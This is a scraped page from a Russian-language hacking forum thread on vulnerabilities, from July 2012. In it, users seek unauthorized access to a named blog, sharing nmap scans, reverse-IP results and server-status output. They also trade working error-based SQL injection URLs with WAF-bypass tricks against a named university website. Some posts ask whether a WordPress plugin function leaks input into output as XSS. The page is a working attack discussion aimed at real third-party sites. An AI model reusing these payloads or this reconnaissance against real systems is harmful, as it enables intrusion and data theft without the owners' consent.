Вопросы по уязвимостям - Страница 217

12309 · 10.07.2012, 15:03

lsof -ni -P | grep 80
посмотри, кто на 80 порту висит. может быть что угодно, и может даже вообще ничего не быть - т.е. апач висит на 80 порту, а на него траф идёт с другого сервера.

oRb · 10.07.2012, 18:36

SERVER_ADDR отличается от REMOTE_ADDR? Если нет, то стоит прокси на этой же тачке. Если отличаются, то frontend и backend на разных серверах.

Pirotexnik · 11.07.2012, 00:37

Всем ку.
Такая проблемма: крайне необходимо получить доступ к блогу. Блог стоит на http://summer-breath.com
Реверс выдал следующее:

Цитата:

cppst.com
dreamsbook.org
ffi.kharkov.ua
photoleaks.com
summer-breath.com

Ни на одном из них ничего полезного не нашел

Пентестил как руками, так и сканерами.

вывод nmap:

Код:

21	tcp	open	ftp 	syn-ack	ProFTPD 	 	 
22	tcp	open	ssh 	syn-ack	OpenSSH 	5.1p1 	FreeBSD 20080901; protocol 2.0 
25	tcp	open	smtp 	syn-ack	Sendmail 	8.14.3/8.14.3 	 
53	tcp	open	domain 	syn-ack	ISC BIND 	9.4.3-P2 	 
80	tcp	open	http 	syn-ack	nginx 	 	 
110	tcp	open	pop3 	syn-ack	Dovecot pop3d 	 	 
143	tcp	open	imap 	syn-ack	Dovecot imapd 	 	 
443	tcp	open	http 	syn-ack	Apache httpd 	 	 
587	tcp	open	smtp 	syn-ack	Sendmail 	8.14.3/8.14.3 	 
993	tcp	open	imap 	syn-ack	Dovecot imapd 	 	 
995	tcp	open	pop3 	syn-ack	Dovecot pop3d 	 	 
3306	tcp	open	mysql 	syn-ack	MySQL 	 	unauthorized 

Used port: 21/tcp (open) 
Used port: 1/tcp (closed) 
Used port: 35420/udp (closed) 
OS match: FreeBSD 6.3-RELEASE (98%)
OS match: FreeBSD 7.0-RELEASE (97%)
OS match: FreeBSD 7.1-PRERELEASE 7.2-STABLE (97%)
OS match: FreeBSD 7.0-RC1 (93%)
OS match: FreeBSD 7.0-RELEASE - 8.0-STABLE (93%)
OS match: FreeBSD 7.1-RELEASE (93%)
OS match: FreeBSD 7.2-RELEASE - 8.0-RELEASE (93%)
OS match: FreeBSD 7.0-STABLE (93%)
OS match: m0n0wall 1.3b11 - 1.3b15 FreeBSD-based firewall (90%)
OS match: FreeBSD 7.0-RELEASE-p5 (90%)

Ещё есть такая штука.
summer-breath.com/server-status

Цитата:

Apache Server Status for summer-breath.com
Server Version: Apache/2.2.13 (FreeBSD) DAV/2 PHP/5.3.8 mod_ssl/2.2.13 OpenSSL/0.9.8e
Server Built: Dec 2 2009 18:45:22

Из дыр нашел только XSS, но для ее эксплуатации необходим особый параметр в куках. А его из адресной строки не передашь

Какие есть варианты, и есть ли вообще? Выручайте...

Зарание спасибо.
p.s. Не удаляйте пожалуйста пост, это очень важно для меня.

__________________________________________________ __________________________

Цитата:

Сообщение от kingbeef

Обход waf.
Фильтруется select.Помогите плиз.

PHP код:


			
http://www.bsu.edu.ru/mc/faculty.php?id=1&type=-8+/*union*/%0aunion+selectect+1,2,3,4,5,6,7,8,9,10--+f

Select режится только в случае, если есть union.

Юзай error based

__________________________________________________ __________________________

Цитата:

Да там еще и from, version(), database(), user() режутся...

Да, я заметил такую тенденцию:
там ищутся пары. Тоесть по отдельности они пройдут. А так же пройдет, если без пары.

Svet · 11.07.2012, 01:41

Цитата:

Сообщение от Pirotexnik

Select режится только в случае, если есть union.

Юзай error based

Да там еще и from, version(), database(), user() режутся...

kingbeef · 11.07.2012, 13:51

PHP код:


			
http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g

Режется select

PHP код:


			
http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(select+1+from(select+count(*),concat((select+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g

Режется версия и первый select

Pirotexnik · 11.07.2012, 17:21

Цитата:

Сообщение от kingbeef

PHP код:


			
http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g

Режется select

PHP код:


			
http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(select+1+from(select+count(*),concat((select+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g

Режется версия и первый select

http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(/*+++select+select+++*/+select+1+from(select+count(*),concat((select+@@ve rsion),floor(rand(0)*2))x+from+information_schema. tables+group+by+x)a)--+g

12309 · 11.07.2012, 17:37

Цитата:

Сообщение от Pirotexnik

Реверс выдал следующее:

Цитата:

cppst.com
dreamsbook.org
ffi.kharkov.ua
photoleaks.com
summer-breath.com

там еще http://droughtword.com/ есть

Untitled · 11.07.2012, 17:39

Цитата:

Сообщение от oRb

SERVER_ADDR отличается от REMOTE_ADDR?

Да, отличаются.

Цитата:

Сообщение от oRb

Если нет, то стоит прокси на этой же тачке. Если отличаются, то frontend и backend на разных серверах.

Не уловил, фронтэнд/бэкэнд чего?

Цитата:

Сообщение от 12309

lsof -ni -P | grep 80

Код:

rpc.statd   801    statd    6u  IPv4     3685      0t0  UDP *:977
rpc.statd   801    statd    9u  IPv4     3693      0t0  UDP *:55607
rpc.statd   801    statd   10u  IPv4     3698      0t0  TCP *:58621 (LISTEN)
apache2    1315     root    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26788 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26788 www-data   15u  IPv4 13989835      0t0  TCP 10.128.1.143:80->123.12.1.123:44536 (ESTABLISHED)
apache2   26799 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26801 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26812 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26812 www-data   15u  IPv4 13989842      0t0  TCP 10.128.1.143:80->123.12.1.123:59471 (ESTABLISHED)
apache2   26826 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26828 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26833 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26833 www-data   15u  IPv4 13989819      0t0  TCP 10.128.1.143:80->123.12.1.123:58474 (ESTABLISHED)
apache2   26834 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26834 www-data   15u  IPv4 13989833      0t0  TCP 10.128.1.143:80->123.12.1.123:44258 (ESTABLISHED)
apache2   26835 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26835 www-data   15u  IPv4 13989830      0t0  TCP 10.128.1.143:80->123.12.1.123:19784 (ESTABLISHED)
apache2   26836 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26837 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26841 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26842 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26842 www-data   15u  IPv4 13989811      0t0  TCP 10.128.1.143:80->123.12.1.123:58252 (ESTABLISHED)
apache2   26843 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26843 www-data   15u  IPv4 13989826      0t0  TCP 10.128.1.143:80->123.12.1.123:58650 (ESTABLISHED)
apache2   26844 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26844 www-data   15u  IPv4 13989827      0t0  TCP 10.128.1.143:80->123.12.1.123:24484 (ESTABLISHED)
apache2   26845 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26846 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)
apache2   26847 www-data    3u  IPv4     6247      0t0  TCP *:80 (LISTEN)

10.128.1.143 - SERVER_ADDR.
123.12.1.123 - REMOTE_ADDR.

Цитата:

Сообщение от 12309

может быть что угодно, и может даже вообще ничего не быть - т.е. апач висит на 80 порту, а на него траф идёт с другого сервера.

Подключенные модули:

Цитата:

core mod_log_config mod_logio prefork http_core mod_so mod_alias mod_auth_basic mod_authn_file mod_authz_default mod_authz_groupfile mod_authz_host mod_authz_user mod_autoindex mod_cgi mod_deflate mod_dir mod_env mod_headers mod_mime mod_negotiation mod_php5 mod_reqtimeout mod_rewrite mod_setenvif mod_status

Чего-то вроде mod_proxy нет, возможно, просто проброс портов?

Pirotexnik · 12.07.2012, 03:04

Подскажите:

PHP код:


			
function __func() {  

         check_ajax_referer( 'conten-plugin' );  

   

         $term   = urlencode( $_GET[ 'term' ] );  

         $result = wp_remote_get( 'http://www.google.com/complete/search?output=toolbar&q=' . $term );  

   

         preg_match_all( '/suggestion data="([^"]+)"\/>/u', $result[ 'body' ], $matches );  

   

         $return_arr = array();  

   

         foreach ( $matches[ 1 ] as $match ) {  

                 $return_arr[ ] = html_entity_decode( $match, ENT_COMPAT, "UTF-8" );  

         }  

         echo json_encode( $return_arr );  // вот этот момент

         die();  

 }

А не попадет ли значение из гета в вывод?
Не XSS ли тут часом?

b3 · 12.07.2012, 13:27

Pirotexnik
http://php.net/manual/ru/function.html-entity-decode.php

10.07.2012, 18:36	#2162
oRb Регистрация: 01.07.2010 Сообщений: 319 Репутация: 138	SERVER_ADDR отличается от REMOTE_ADDR? Если нет, то стоит прокси на этой же тачке. Если отличаются, то frontend и backend на разных серверах. __________________ Не оказываю никаких услуг. I don't provide any services.

11.07.2012, 13:51	#2165
kingbeef Регистрация: 28.10.2011 Сообщений: 17 Репутация: 0	PHP код: `http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(select+1+from(select+count(),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)2))x+from+information_schema.tables+group+by+x)a)--+g` Режется select PHP код: `http://www.bsu.edu.ru/mc/faculty.php?id=1&type=8+and(select+1+from(select+count(),concat((select+version()),floor(rand(0)2))x+from+information_schema.tables+group+by+x)a)--+g` Режется версия и первый select Последний раз редактировалось kingbeef; 11.07.2012 в 14:29..

12.07.2012, 03:04	#2169
Pirotexnik Регистрация: 16.05.2012 Сообщений: 32 Репутация: -2	Подскажите: PHP код: function __func() { check_ajax_referer( 'conten-plugin' ); $term = urlencode( $_GET[ 'term' ] ); $result = wp_remote_get( 'http://www.google.com/complete/search?output=toolbar&q=' . $term ); preg_match_all( '/suggestion data="([^"]+)"\/>/u', $result[ 'body' ], $matches ); $return_arr = array(); foreach ( $matches[ 1 ] as $match ) { $return_arr[ ] = html_entity_decode( $match, ENT_COMPAT, "UTF-8" ); } echo json_encode( $return_arr ); // вот этот момент die(); } А не попадет ли значение из гета в вывод? Не XSS ли тут часом? __________________ h4q 4ll w0rld

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

10.07.2012, 15:03	#2161
12309 Регистрация: 25.12.2011 Сообщений: 265 Репутация: 33	lsof -ni -P \| grep 80 посмотри, кто на 80 порту висит. может быть что угодно, и может даже вообще ничего не быть - т.е. апач висит на 80 порту, а на него траф идёт с другого сервера.

12.07.2012, 13:27	#2170
b3 Регистрация: 18.08.2010 Сообщений: 354 Репутация: 105	Pirotexnik http://php.net/manual/ru/function.html-entity-decode.php